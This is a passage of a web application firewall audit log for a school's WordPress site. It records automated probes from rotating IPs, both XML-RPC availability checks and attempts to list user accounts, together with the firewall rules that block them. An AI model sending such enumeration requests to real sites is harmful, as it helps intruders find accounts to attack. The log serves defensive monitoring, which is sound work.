Action: Intercepted (phase 2) Stopwatch: 1747426102398429 2324 (- - -) Stopwatch2: 1747426102398429 2324; combined=1084, p1=339, p2=712, p3=0, p4=0, p5=32, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3909e953-Z-- --e83a1448-A-- [17/May/2025:03:08:27 +0700] aCebO8e47ocjCGWTS4Y_IgAAAFg 103.236.140.4 54724 103.236.140.4 8181 --e83a1448-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.77.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.77.163 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e83a1448-C-- demo.sayHello --e83a1448-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e83a1448-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747426107536727 5229 (- - -) Stopwatch2: 1747426107536727 5229; combined=3923, p1=510, p2=3205, p3=27, p4=23, p5=92, sr=67, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e83a1448-Z-- --fd2bd514-A-- [17/May/2025:03:08:58 +0700] aCebWse47ocjCGWTS4Y_JAAAAEE 103.236.140.4 54728 103.236.140.4 8181 --fd2bd514-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.82.124 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.82.124 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --fd2bd514-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fd2bd514-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747426138418806 3093 (- - -) Stopwatch2: 1747426138418806 3093; combined=1344, p1=455, p2=854, p3=0, p4=0, p5=35, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fd2bd514-Z-- --dc5c7226-A-- [17/May/2025:03:09:05 +0700] aCebYce47ocjCGWTS4Y_JgAAAEQ 103.236.140.4 54732 103.236.140.4 8181 --dc5c7226-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.82.124 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.82.124 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --dc5c7226-C-- demo.sayHello --dc5c7226-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --dc5c7226-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747426145325525 6343 (- - -) Stopwatch2: 1747426145325525 6343; combined=4594, p1=568, p2=3689, p3=91, p4=38, p5=123, sr=82, sw=85, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dc5c7226-Z-- --6a2cbd60-A-- [17/May/2025:03:09:36 +0700] aCebgMe47ocjCGWTS4Y_KAAAAEw 103.236.140.4 54736 103.236.140.4 8181 --6a2cbd60-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.39.45 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.39.45 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6a2cbd60-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6a2cbd60-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747426176808301 2833 (- - -) Stopwatch2: 1747426176808301 2833; combined=1271, p1=427, p2=815, p3=0, p4=0, p5=29, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6a2cbd60-Z-- --95145d4c-A-- [17/May/2025:03:09:42 +0700] aCebhse47ocjCGWTS4Y_KgAAAE0 103.236.140.4 54742 103.236.140.4 8181 --95145d4c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.199.200 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.199.200 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --95145d4c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --95145d4c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747426182132192 2927 (- - -) Stopwatch2: 1747426182132192 2927; combined=1362, p1=416, p2=913, p3=0, p4=0, p5=33, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --95145d4c-Z-- --0810bb53-A-- [17/May/2025:03:09:42 +0700] aCebhse47ocjCGWTS4Y_KQAAAEY 103.236.140.4 54740 103.236.140.4 8181 --0810bb53-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.39.45 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.39.45 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0810bb53-C-- demo.sayHello --0810bb53-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0810bb53-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747426182129179 6618 (- - -) Stopwatch2: 1747426182129179 6618; combined=5116, p1=539, p2=4357, p3=36, p4=33, p5=89, sr=75, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0810bb53-Z-- --1beef61c-A-- [17/May/2025:03:09:46 +0700] aCebise47ocjCGWTS4Y_KwAAAFA 103.236.140.4 54748 103.236.140.4 8181 --1beef61c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.199.200 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.199.200 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1beef61c-C-- demo.sayHello --1beef61c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1beef61c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747426186985820 4749 (- - -) Stopwatch2: 1747426186985820 4749; combined=3712, p1=473, p2=3020, p3=24, p4=22, p5=100, sr=67, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1beef61c-Z-- --6fbd6b2f-A-- [17/May/2025:03:09:50 +0700] aCebjse47ocjCGWTS4Y_LAAAAEk 103.236.140.4 54752 103.236.140.4 8181 --6fbd6b2f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.95.206 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.95.206 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6fbd6b2f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6fbd6b2f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747426190729317 3265 (- - -) Stopwatch2: 1747426190729317 3265; combined=1349, p1=461, p2=856, p3=0, p4=0, p5=32, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6fbd6b2f-Z-- --7d6ffc01-A-- [17/May/2025:03:09:56 +0700] aCeblMe47ocjCGWTS4Y_LgAAAFE 103.236.140.4 54756 103.236.140.4 8181 --7d6ffc01-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.95.206 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.95.206 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7d6ffc01-C-- demo.sayHello --7d6ffc01-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7d6ffc01-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747426196288555 5933 (- - -) Stopwatch2: 1747426196288555 5933; combined=4344, p1=560, p2=3516, p3=33, p4=38, p5=117, sr=78, sw=80, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7d6ffc01-Z-- --10618957-A-- [17/May/2025:03:09:56 +0700] aCeblMe47ocjCGWTS4Y_LwAAAEM 103.236.140.4 54758 103.236.140.4 8181 --10618957-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.46.140 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.46.140 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --10618957-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --10618957-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747426196783350 1962 (- - -) Stopwatch2: 1747426196783350 1962; combined=961, p1=325, p2=610, p3=0, p4=0, p5=26, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --10618957-Z-- --6acd510e-A-- [17/May/2025:03:10:03 +0700] aCebm9e6THFz1hsaJaLZSQAAABI 103.236.140.4 54764 103.236.140.4 8181 --6acd510e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.46.140 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.46.140 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6acd510e-C-- demo.sayHello --6acd510e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6acd510e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747426203857122 6069 (- - -) Stopwatch2: 1747426203857122 6069; combined=4383, p1=577, p2=3568, p3=33, p4=37, p5=98, sr=75, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6acd510e-Z-- --860ed42d-A-- [17/May/2025:03:10:15 +0700] aCebp8e47ocjCGWTS4Y_MgAAAFY 103.236.140.4 54768 103.236.140.4 8181 --860ed42d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.91.225 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.91.225 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --860ed42d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --860ed42d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747426215961771 3450 (- - -) Stopwatch2: 1747426215961771 3450; combined=1429, p1=493, p2=904, p3=0, p4=0, p5=32, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --860ed42d-Z-- --f282da14-A-- [17/May/2025:03:10:17 +0700] aCebqce47ocjCGWTS4Y_MwAAAFc 103.236.140.4 54770 103.236.140.4 8181 --f282da14-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.197 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.197 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f282da14-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f282da14-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747426217929314 2136 (- - -) Stopwatch2: 1747426217929314 2136; combined=979, p1=337, p2=615, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f282da14-Z-- --fb04914f-A-- [17/May/2025:03:10:20 +0700] aCebrNe6THFz1hsaJaLZSwAAABM 103.236.140.4 54776 103.236.140.4 8181 --fb04914f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.91.225 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.91.225 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fb04914f-C-- demo.sayHello --fb04914f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fb04914f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747426220122138 4811 (- - -) Stopwatch2: 1747426220122138 4811; combined=3670, p1=438, p2=3020, p3=21, p4=23, p5=96, sr=68, sw=72, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fb04914f-Z-- --dabdee5c-A-- [17/May/2025:03:10:23 +0700] aCebr8e47ocjCGWTS4Y_NQAAAEI 103.236.140.4 54778 103.236.140.4 8181 --dabdee5c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.197 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.197 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --dabdee5c-C-- demo.sayHello --dabdee5c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --dabdee5c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747426223131699 4585 (- - -) Stopwatch2: 1747426223131699 4585; combined=3591, p1=449, p2=2948, p3=23, p4=26, p5=85, sr=74, sw=60, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dabdee5c-Z-- --d7e9c371-A-- [17/May/2025:03:10:25 +0700] aCebsce47ocjCGWTS4Y_NwAAAEs 103.236.140.4 54782 103.236.140.4 8181 --d7e9c371-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.83.183 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.83.183 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d7e9c371-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d7e9c371-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747426225434610 2772 (- - -) Stopwatch2: 1747426225434610 2772; combined=1259, p1=430, p2=799, p3=0, p4=0, p5=30, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d7e9c371-Z-- --b3463618-A-- [17/May/2025:03:10:28 +0700] aCebtMe47ocjCGWTS4Y_OQAAAEo 103.236.140.4 54786 103.236.140.4 8181 --b3463618-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.74.171 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.74.171 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b3463618-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b3463618-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg 